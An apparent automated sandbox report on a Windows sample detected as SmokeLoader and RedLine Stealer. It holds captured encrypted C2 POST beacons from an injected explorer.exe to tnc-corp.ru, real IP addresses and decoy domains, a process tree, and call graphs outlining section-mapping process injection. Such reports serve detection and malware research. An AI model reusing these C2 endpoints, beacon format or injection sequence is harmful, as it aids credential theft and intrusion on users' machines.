                                              • gepbcyyudpal.com
                                              • fesuvivdhkbb.org
                                              • nsdytqsgostosx.com
                                              • hiqciwywnoxbutl.org
                                              • qwkcueenkbefpetu.com
                                              • tdgawojgabqorytu.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.456798181.123.219.23802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:02:27.680521011 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://kquacpdyiao.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 169
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:02:27.680555105 CEST169OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 3a a4 8d
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vu>:OFOhexd]Dmg.[?oje\t@L"kF?o/


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.457004181.123.219.23802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:03:46.513629913 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://dokhxstskamwqb.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 297
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:03:46.513658047 CEST297OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 43 f0 f1
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vutCxOT*O<M{6TWg!u%@,b-?HK7&mq 0.\}3Xk@UbxoCzREFavh/E.x


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.457064181.123.219.23802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:04:02.361991882 CEST285OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://xueqsaqwudqkfjhf.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 126
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:04:02.362026930 CEST126OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 47 a7 80
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vu(GUt.r~69Za{


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.457074181.123.219.23802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:04:20.503911972 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gepbcyyudpal.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 269
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:04:20.503942966 CEST269OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 4b ae 9f
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vuRK4msa^#tOS7s-U]zGPE:I87UPa#[qoOL2CKR5uG CqZ/}jPzc:-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.457075181.123.219.23802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:04:36.348220110 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://fesuvivdhkbb.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 118
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:04:36.348248005 CEST118OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 09 b5 fe
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vu]iChTo6@'l3^7[


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.457076181.123.219.23802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:04:53.264657021 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://nsdytqsgostosx.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 245
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:04:53.264688969 CEST245OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 04 fb a5
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vuFn8VwlDRU &KKaxAW5)6Ji]^5Qr63h4~WDv\P2k/8jS_;vw|_.z


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.457077152.231.120.3802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:05:11.501455069 CEST284OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://hiqciwywnoxbutl.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 354
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:05:11.501496077 CEST354OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 38 d6 a5
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vun8ME`;po2_=c}N4b{8"^N[K3+le9fAs:3.]dU#q*OYYFYmxz+FT


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.459097152.231.120.3802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:05:32.108335018 CEST285OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qwkcueenkbefpetu.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 132
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:05:32.108369112 CEST132OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 29 db f5
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vuQ)H1wjgz"E086]JmS,wx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.459098152.231.120.3802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 20, 2024 06:05:49.094544888 CEST285OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://tdgawojgabqorytu.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 174
                                              Host: tnc-corp.ru
                                              Oct 20, 2024 06:05:49.094574928 CEST174OUTData Raw: 3b 6e 21 12 85 bb 6c 24 ab a8 c4 04 0e 08 09 bc 0c 0e c8 e6 18 76 e5 66 08 0b 78 e2 47 b7 c5 1e ed 5c c0 5f 01 6f 56 1d 9c ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 45 a6 fa
                                              Data Ascii: ;n!l$vfxG\_oV? 9Yt M@NA .[k,vu:E2@OxeS)eSIptUT)]p71F@4!%g6A1qz


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:00:01:58
                                              Start date:20/10/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:377'856 bytes
                                              MD5 hash:6495432F0808EB94291D12C862216FE2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1749095157.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1749170921.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1749170921.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:00:02:04
                                              Start date:20/10/2024
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff72b770000
                                              File size:5'141'208 bytes
                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:5
                                              Start time:00:02:24
                                              Start date:20/10/2024
                                              Path:C:\Users\user\AppData\Roaming\wdhwgdv
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\wdhwgdv
                                              Imagebase:0x400000
                                              File size:377'856 bytes
                                              MD5 hash:6495432F0808EB94291D12C862216FE2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1991730217.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1991754480.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1991819627.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1991819627.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 41%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:8.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:35.7%
                                                Total number of Nodes:112
                                                Total number of Limit Nodes:4
                                                execution_graph 2890 601560 2891 601598 2890->2891 2892 601567 2890->2892 2893 601d11 3 API calls 2892->2893 2894 601589 2893->2894 2848 620001 2849 620005 2848->2849 2854 62092b GetPEB 2849->2854 2851 620030 2856 62003c 2851->2856 2855 620972 2854->2855 2855->2851 2857 620049 2856->2857 2858 620e0f 2 API calls 2857->2858 2859 620223 2858->2859 2860 620d90 GetPEB 2859->2860 2861 620238 VirtualAlloc 2860->2861 2862 620265 2861->2862 2863 6202ce VirtualProtect 2862->2863 2865 62030b 2863->2865 2864 620439 VirtualFree 2868 6204be LoadLibraryA 2864->2868 2865->2864 2867 6208c7 2868->2867 2869 620005 2870 62092b GetPEB 2869->2870 2871 620030 2870->2871 2872 62003c 7 API calls 2871->2872 2873 620038 2872->2873 2920 40198a 2921 4019a8 Sleep 2920->2921 2922 401207 2920->2922 2923 4019c3 2921->2923 2922->2921 2924 401583 7 API calls 2923->2924 2925 4019d4 2923->2925 2924->2925 2926 40158e 2927 4015bf 2926->2927 2928 401634 NtDuplicateObject 2927->2928 2937 401750 2927->2937 2929 401651 NtCreateSection 2928->2929 2928->2937 2930 4016d1 NtCreateSection 2929->2930 2931 401677 NtMapViewOfSection 2929->2931 2933 4016fd 2930->2933 2930->2937 2931->2930 2932 40169a NtMapViewOfSection 2931->2932 2932->2930 2934 4016b8 2932->2934 2935 401707 NtMapViewOfSection 2933->2935 2933->2937 2934->2930 2936 40172e NtMapViewOfSection 2935->2936 2935->2937 2936->2937 2840 402e50 2842 402e54 2840->2842 2841 401959 8 API calls 2843 402fa8 2841->2843 2842->2841 2842->2843 2895 401970 2896 401975 2895->2896 2897 4019a8 Sleep 2896->2897 2898 4019c3 2897->2898 2899 401583 7 API calls 2898->2899 2900 4019d4 2898->2900 2899->2900 2780 601571 2781 601580 2780->2781 2784 601d11 2781->2784 2785 601d2c 2784->2785 2786 601d35 CreateToolhelp32Snapshot 2785->2786 2787 601d51 Module32First 2785->2787 2786->2785 2786->2787 2788 601d60 2787->2788 2789 601589 2787->2789 2791 6019d0 2788->2791 2792 6019fb 2791->2792 2793 601a44 2792->2793 2794 601a0c VirtualAlloc 2792->2794 2793->2793 2794->2793 2795 403054 2796 403197 2795->2796 2797 40307e 2795->2797 2797->2796 2798 403139 RtlCreateUserThread NtTerminateProcess 2797->2798 2798->2796 2799 402f17 2800 402f1c 2799->2800 2802 402fa8 2800->2802 2803 401959 2800->2803 2804 401968 2803->2804 2805 4019a8 Sleep 2804->2805 2806 4019c3 2805->2806 2808 4019d4 2806->2808 2809 401583 2806->2809 2808->2802 2810 401594 2809->2810 2811 401634 NtDuplicateObject 2810->2811 2820 401750 2810->2820 2812 401651 NtCreateSection 2811->2812 2811->2820 2813 4016d1 NtCreateSection 2812->2813 2814 401677 NtMapViewOfSection 2812->2814 2816 4016fd 2813->2816 2813->2820 2814->2813 2815 40169a NtMapViewOfSection 2814->2815 2815->2813 2817 4016b8 2815->2817 2818 401707 NtMapViewOfSection 2816->2818 2816->2820 2817->2813 2819 40172e NtMapViewOfSection 2818->2819 2818->2820 2819->2820 2820->2808 2907 401919 2908 401969 2907->2908 2909 40191d 2907->2909 2910 4019a8 Sleep 2908->2910 2911 4019c3 2910->2911 2912 401583 7 API calls 2911->2912 2913 4019d4 2911->2913 2912->2913 2821 62003c 2822 620049 2821->2822 2834 620e0f SetErrorMode SetErrorMode 2822->2834 2827 620265 2828 6202ce VirtualProtect 2827->2828 2830 62030b 2828->2830 2829 620439 VirtualFree 2833 6204be LoadLibraryA 2829->2833 2830->2829 2832 6208c7 2833->2832 2835 620223 2834->2835 2836 620d90 2835->2836 2837 620dad 2836->2837 2838 620dbb GetPEB 2837->2838 2839 620238 VirtualAlloc 2837->2839 2838->2839 2839->2827

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 106 401916-401956 call 401207 100->106 104 401605-40162e 101->104 105 401907 101->105 104->105 114 401634-40164b NtDuplicateObject 104->114 105->106 114->105 115 401651-401675 NtCreateSection 114->115 118 4016d1-4016f7 NtCreateSection 115->118 119 401677-401698 NtMapViewOfSection 115->119 118->105 122 4016fd-401701 118->122 119->118 120 40169a-4016b6 NtMapViewOfSection 119->120 120->118 123 4016b8-4016ce 120->123 122->105 125 401707-401728 NtMapViewOfSection 122->125 123->118 125->105 127 40172e-40174a NtMapViewOfSection 125->127 127->105 130 401750 127->130 130->105 131 401750 call 401755 130->131 131->105
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                                • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 147 401916-401956 call 401207 141->147 145 401605-40162e 142->145 146 401907 142->146 145->146 155 401634-40164b NtDuplicateObject 145->155 146->147 155->146 156 401651-401675 NtCreateSection 155->156 159 4016d1-4016f7 NtCreateSection 156->159 160 401677-401698 NtMapViewOfSection 156->160 159->146 163 4016fd-401701 159->163 160->159 161 40169a-4016b6 NtMapViewOfSection 160->161 161->159 164 4016b8-4016ce 161->164 163->146 166 401707-401728 NtMapViewOfSection 163->166 164->159 166->146 168 40172e-40174a NtMapViewOfSection 166->168 168->146 171 401750 168->171 171->146 172 401750 call 401755 171->172 172->146
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                                • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 185 401916-401956 call 401207 179->185 183 401605-40162e 180->183 184 401907 180->184 183->184 193 401634-40164b NtDuplicateObject 183->193 184->185 193->184 194 401651-401675 NtCreateSection 193->194 197 4016d1-4016f7 NtCreateSection 194->197 198 401677-401698 NtMapViewOfSection 194->198 197->184 201 4016fd-401701 197->201 198->197 199 40169a-4016b6 NtMapViewOfSection 198->199 199->197 202 4016b8-4016ce 199->202 201->184 204 401707-401728 NtMapViewOfSection 201->204 202->197 204->184 206 40172e-40174a NtMapViewOfSection 204->206 206->184 209 401750 206->209 209->184 210 401750 call 401755 209->210 210->184
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                                • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                                • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 228 601d11-601d2a 229 601d2c-601d2e 228->229 230 601d30 229->230 231 601d35-601d41 CreateToolhelp32Snapshot 229->231 230->231 232 601d51-601d5e Module32First 231->232 233 601d43-601d49 231->233 234 601d60-601d61 call 6019d0 232->234 235 601d67-601d6f 232->235 233->232 238 601d4b-601d4f 233->238 239 601d66 234->239 238->229 238->232 239->235
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00601D39
                                                • Module32First.KERNEL32(00000000,00000224), ref: 00601D59
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1749095157.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: a889173fc60e773544fc5e98953646f414e7b4d0d9b537dd6420ef454777ade7
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: CCF0F0322403146BD7243BF9A88CBAFB2EDEF4A324F100528F642991C0DBB0EC054AA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
